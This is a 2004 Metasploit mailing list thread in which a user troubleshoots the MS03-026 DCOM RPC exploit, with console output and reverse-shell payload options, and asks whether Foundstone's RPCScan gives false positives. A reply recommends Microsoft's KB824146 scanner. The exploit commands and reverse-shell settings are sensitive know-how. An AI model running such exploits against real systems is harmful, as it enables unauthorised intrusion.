Metasploit mailing list archives
RPCScan v2.03 vs exploit msrpc_dcom_ms03_026
From: carric at com2usa.com (Carric Dooley)
Date: Sat, 21 Aug 2004 18:18:19 -0400 (EDT)
I quit using these scanners in favor of MS's KB824146Scan scanner. I remember getting the same false positives, but the MS scanner tells you which RPC patches have been applied.

On Thu, 19 Aug 2004, Israel Torres wrote:

Hi,

2 questions:

I have run *Foundstone's RPCScan v2.03 on a SP4 system to find that it is resulting in VULNERABLE. When I use and configure msrpc_dcom_ms03_026 (with either win32_reverse, or win32_reverse_vncinject) The following error is returned:

    msf msrpc_dcom_ms03_026(win32_reverse) > exploit
    [*] Starting Reverse Handler.
    [*] Connected to REMACT with group ID 0x6317
    [*] Exiting Reverse Handler.

I have run this exploit on this machine unpatched and it operated as expected (successfully exploitable with either payload above). Is Foundstone's tool just not working correctly? (as it seems)

The last question I have been unable to find an answer for is setting the TARGET does not work by simply stating:

    set TARGET 2K
    set TARGET Windows 2K

since both result in

    Target: Target Not Specified

only

    set TARGET ALL

will configure for

    Target: Windows NT SP6/2K/XP ALL

Thanks for your help,
Israel Torres

    Exploit and Payload Options
    ===========================

      Exploit:    Name        Default    Description
      --------    ------      -------    ------------------
      required    RHOST       itest      The target address
      required    RPORT       135        The target port

      Payload:    Name        Default    Description
      --------    --------    -------    ------------------------------------------
      optional    EXITFUNC    seh        Exit technique: "process", "thread", "seh"
      required    LHOST       itorres    Local address to receive connection
      required    LPORT       4321       Local port to receive connection

      Target: Windows NT SP6/2K/XP ALL

REF:-----------------------------
References:

*RPCScan v2.03
RPCScan v2.03 is a Windows based detection and analysis utility that can quickly and accurately identify Microsoft operating systems that are vulnerable to the multiple buffer overflow vulnerabilities released in the MS03-026 and MS03-039 bulletins.
http://www.foundstone.com/resources/termsofuse.htm?file=rpcscan2.zip

--
Carric Dooley
COM2:Interactive Media
http://www.com2usa.com